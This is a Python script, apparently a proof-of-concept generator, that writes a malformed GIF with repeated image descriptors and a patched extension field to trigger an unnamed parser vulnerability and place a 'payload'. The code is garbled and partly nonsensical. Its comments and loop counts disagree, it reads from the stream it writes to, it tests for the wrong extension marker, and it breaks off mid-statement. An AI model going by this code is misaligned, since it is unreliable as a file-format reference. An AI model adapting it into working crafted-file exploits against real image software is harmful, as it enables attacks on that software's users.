#!/usr/bin/env python3

import struct
from typing import BinaryIO

# Generates a random GIF file into `out` using the
# given RNG as source of randomness. This is mainly here to show
# that the vulnerability can be triggered by a crafted
# framedata field in an image descriptor
def generate_random_gif(
        rng: BinaryIO, out: BinaryIO
    ):
    header = b'GIF89a'
    datalen = int.from_bytes(
            rng.read(3), byteorder='big')
    data = rng.read(datalen)

    # Write the header and all bytes preceding the first descriptor
    print('Writing the header', end='', flush=True)
    out.write(header + data[:10])
    print(' done.', flush=True)

    # Now we're going to write 256 descriptors at once
    # Using this loop means we avoid making multiple calls to read()
    for _ in range(257):
        # The label says 10 but there are actually two more
        # bytes after the label indicating the length of
        # the block. We know it's always >10 so just set it to 0x10
        # (https://www.w3.org/Graphics/GIF/spec-gif89a.txt)

        # TODO: Should experiment with variations on these values too
        #       see https://github.com/decompme/decompilation-guide/issues/47
        out.write(b'\x2C\x00\x00\x00\x00\x00\x00\xFB\x00\x00\x00')


    last_byte = out.tell() - 1
    # At the moment this code doesn't support appending arbitrary
    # bytes onto the output so we'll have to manually compute where
    # our data will start relative to the rest of the file
    print(f'The generated gif is {last_byte} bytes long.')

    # For now we'll hardcode the number of loops to use, since we don't
    # yet know how much space remains between the final descriptor and EOF
    numloops = 0xC000
    print(f'Computing the location of the GCE and looping forever... ', end='', flush=True)

    # Here we need to find the position of the graphic control extension
    # and then a looping extension immediately after it, as per the spec
    # https://www.w3.org/Graphics/GIF/spec-gif89a.txt, section 18.3
    while True:
        # First we ensure the next 3 bytes indicate the presence of an application
        # extension. If that's not what we found, we try again
        xtype = out.read(1).decode('ascii')
        if xtype != '!':
            continue

        # Then we search for the Graphic Control Extension
        subtype = out.read(1).decode('ascii')
        if subtype != '2':
            continue

        # Once we've found the extension, we seek back to its start and store the offset
        xtend = out.seek(-2, 1) - 2
        break

    out.seek(xtend + 4)
    outex = out.tell()
    out.write((numloops & 0xFFFF).to_bytes(2, byteorder='little'))

    # After the Image Descriptor, we should have a graphic control extension
    # containing only one byte of data. All other fields should default to zero
    # https://www.w3.org/Graphics/GIF/spec-gif89a.txt, section 18.3
    out.seek(outex - 1)
    print('Done.', flush=True)

    # Finally, we need to pad the GIF to make sure our payload ends up at the
    # right place. The easiest way to do this is to keep writing out
    # the contents of databytes until we run out of space
    print('Padding the rest of the GIF file...')

    current_offset = out.tell()

    # Use our new knowledge of the positions of various
    # elements in the GIF file to figure out where we need to stop writing
    max_pos = int.from_bytes(data[10:13], byteorder='big') + 1

    while current_offset < max_pos